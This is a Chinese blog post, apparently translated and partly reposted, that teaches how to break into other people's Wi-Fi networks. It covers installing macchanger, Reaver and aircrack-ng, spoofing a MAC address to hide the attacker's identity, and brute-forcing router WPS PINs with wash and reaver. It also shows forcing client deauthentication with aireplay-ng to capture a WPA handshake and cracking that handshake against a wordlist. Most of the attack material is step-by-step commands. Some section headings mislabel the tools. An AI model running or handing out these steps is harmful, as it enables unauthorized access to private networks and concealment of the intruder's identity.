从国外网站翻译过来的,可能不甚准确.转载请注明出处.
这篇文章的重点是教我们如何破解不安全的wi-fi网络,我使用的是一款在黑阔间非常流行的外部wi-fi卡AWUSO36H 802.11 b/g 5db,它的市场价大概是20-35美元.这款wi-fi卡的优势在于其广泛的范围,使用者可以挑选所有附近的接入点。
有很多软件可以用来破解wi-fi网络,本文将介绍最常用的两款软件.
1.Reaver
2.Aircrack
操作系统:ubuntu 11.04
第1部分:安装
>> A.(安装的Aplha Wi-Fi卡的驱动程序)
>> B. (安装Macchanger工具)
>> C.(Reaver工具的安装)
>> D(Aircrack工具安装)
第2部分(展示Reaver工具)
>> A.(理论)
>> B.(演示)
第3部分(使用Aircrack工具)
>> A.(演示)
Part1:安装
A.安装的Aplha Wi-Fi卡的驱动程序
当我们将Aplha卡插入USB的时候,需要用我们的linux机器检测。下面介绍Alpha驱动程序的安装过程.将aplha的驱动光盘插入到光驱中,打开终端,进入光盘所在的目录.输入”su”和root账号的密码(请确保您的安装过程是在root权限下进行).然后键入下面命令来安装驱动程序.
#make
#make install
#reboot
重启之后在终端输入”iwconfig”,你会看到一个新的无线接口,有可能是wlan0或者wlan1等,这个接口是有可能改变的。
在上图中,wlan1是我的新接口.
B.安装macchanger工具
当黑客入侵到别人的无线网络的时候,最担心的是如何隐藏他的MAC地址和aplha卡的ID来隐藏自己的身份.你通过你的aplha卡可以看到mac地址(如:00:AC:CA:11:22:44),或者您可以打开终端输入”ifconfig”来检查HWaddr00 WLAN接口,寻找诸如HWaddr 00:11:22:XX:XX:XX.
我们需要在攻击之前改变我们的MAC地址,下面介绍MACchanger工具的安装。打开终端输入以下命令:
#apt-get install macchanger
注意:如果返回错误,在这里只需在终端输入“#apt-get update”,然后再次尝试上面的命令。一旦安装完成后,使用以下命令检查是否安装成功.
#macchanger –help
如果你看到下面的帮助文件,那么你已经成功安装了MACCHANGER工具。
Macchanger的相关参数
用法: macchanger [options] device
-h, –help 显示帮助信息
-v, –version 打印版本信息并退出
-s, –show 打印出mac的地址并退出
-e, –ending 不改变供应商的字节
-a, –anothering 另一组随机同类厂商的MAC
-A, 设置随机同类厂商的任何形式的MAC
-p, –permanent 重置为原始的永久的MAC
– r, –random 设置完全随机的MAC
-l, –list[=keyword] 显示知名厂商
-m, –mac=XX:XX:XX:XX:XX:XX
-mac XX:XX:XX:XX:XX:XX 设置Mac
下面继续进入下一部分的安装
C.安装Reaver工具
在google搜索reaver-1.2.tar.gz,下载保存在桌面,打开终端(root权限),进入到桌面的文件夹,
这样你就可以使用下面的命令提取tar文件:
#tar zxvf file_name
你会看到一个创建的文件夹,使用”cd file_name”从终端进入该文件夹,寻找具有”configure”文件
的文件夹,一旦你找到它,在中断键入一下命令(确保你是在配置文件相同的路径):
#./configure
#make
#make install
注意:如果遇到错误,可能需要安装一些相关的依赖组件,如下;
#apt-get install libpcap-dev
注意:它可能依赖于SQL-lite,因此输入以下命令
#apt-get install libsqlite3-dev
然后输入以下命令继续安装:
#./configure
#make
#make install
检查Reaver工具是否安装成功,输入以下命令:
#reaver
你将看到以下的相关信息
Reaver v1.4 WiFi Protected Setup Attacktool
Copyright (C) 2011,Tactical Network Solutions,Craig Heffner
相关参数(参数的相关说明未翻译,大家可以自行翻译):
-i, –interface=<wlan> Name of the monitor-mode interface to use
-b, –bssid=<mac> BSSID of the target AP
Optional Arguments:
-m, –mac=<mac> MAC of the host system
-e, –essid=<ssid> ESSID of the target AP
-c, –channel=<channel> Set the 802.11 channel for the interface (implies -f)
-o, –out-file=<file> Send output to a log file [stdout]
-s, –session=<file> Restore a previous session file
-C, –exec=<command> Execute the supplied command upon successful pin recovery
-D, –daemonize Daemonize reaver
-a, –auto Auto detect the best advanced options for the target AP
-f, –fixed Disable channel hopping
-5, –5ghz Use 5GHz 802.11 channels
-v, –verbose Display non-critical warnings (-vv for more)
-q, –quiet Only display critical messages
-h, –help Show help
Advanced Options:
-p, –pin=<wps pin> Use the specified 4 or 8 digit WPS pin
-d, –delay=<seconds> Set the delay between pin attempts [1]
-l, –lock-delay=<seconds> Set the time to wait if the AP locks WPS pin attempts [60]
-g, –max-attempts=<num> Quit after num pin attempts
-x, –fail-wait=<seconds> Set the time to sleep after 10 unexpected failures [0]
-r, –recurring-delay=<x:y> Sleep for y seconds every x pin attempts
-t, –timeout=<seconds> Set the receive timeout period [5]
-T, –m57-timeout=<seconds> Set the M5/M7 timeout period [0.20]
-A, –no-associate Do not associate with the AP (association must be done by another application)
-N, –no-nacks Do not send NACK messages when out of order packets are received
-S, –dh-small Use small DH keys to improve crack speed
-L, –ignore-locks Ignore locked state reported by the target AP
-E, –eap-terminate Terminate each WPS session with an EAP FAIL packet
-n, –nack Target AP always sends a NACK [Auto]
-w, –win7 Mimic a Windows 7 registrar [False]
Example:
reaver -i mon0 -b 00:90:4C:C1:AC:21 -vv
D.安装aircrack工具
打开终端输入以下命令:
#apt-get install aircrack-ng
安装完成输入”aircrack-ng”命令,你会在屏幕上看到以下信息
这里WLAN1是我的Wi-Fi卡接口。现在,我们已经完成我们的安装过程中,我们可以开始攻击的学习.
Part2:Aircrack工具的使用.
A.(理论)
在开始攻击之前,让我们看看是什么让aircrack工具在wi-fi攻击中如此强大.2007年wi-fi联盟推出了wi-fi的保护设置(WPS;最初的wi-fi简单配置)来协助家庭用户时谁知道会有小的无线安全和设置问题.基本上,它是用来保护家庭用户的网络,并添加新的无线设备。它具有如下所示的路由器上的按钮。
一旦你找到了网络,你需要输入能在路由上找到的PIN码(基本上是8位数).
WPS设置在暴力攻击面前是脆弱的,在个2011年12月发现的漏洞,让很多具有wps功能的路由器受到了影响.
最初,用户被要求禁用WPS按钮,但在某些路由器上没有办法禁用WPS,Aircrack实际上是暴力猜解工具。让我们来看看具体的攻击过程是如何实现的:
step1: 首先确定wifi网络中支持wps(Reaver中可以看到),然后打开终端输入以下命令(wash已经随Reaver安装)
#wash -i mon0
然后打开reaver tool输入
#reaver -i mon0 -b ENTER_BSSID_HERE -vv
整个破解时间(获取wps pin,wpa psk,and ap ssid)需要大约2-4小时
所以总结来说,使用reaver来hacking wifi网络步骤容易,但是相对来说比较耗时
PS:在更改MAC address时,如果报错说wlan1 is busy,尝试输入以下命令
#ifconfig wlan1 down
# macchanger -A wlan1
#ifconfig wlan1 up
Part3:使用Aircrack hacking
step1:
#airmon-ng start wlan1 (puts card in monitoring mode)
step2:现在我们抓取几个wif网络
#airodump-ng mon0
你可以看到BSSID,ESSID and channel以及加密方式
step3:输入以下命令
#airodump-ng -c 1 -w (filename) -bssid (bssid) mon0
如上图 我们已经连接成功
step4:
为了hack 这里的wpa/wpa2/wep,我们需要建立握手.为了形成握手,我们需要从第三方网络外面接入
#aireplay-ng -0 5 -a (bssid) mon0
step5:
现在一个握手包文件包文件已经被创建,我们可以去看抓包的结果。ctrl+c停止step3中的进程,然后在终端输入:
aircrack-ng drag_file_into_terminal
step6:最后输入以下命令进行破解
#aircrack-ng -w dirctionary_directory handshake_file
本文后半部分关于Reaver和aircrack的使用过程转载自freebuf:http://www.freebuf.com/articles/5012.html,谢谢.
- 本文固定链接: http://www.nxadmin.com/tools/573.html
- 转载请注明: admin 于 阿德马Web安全 发表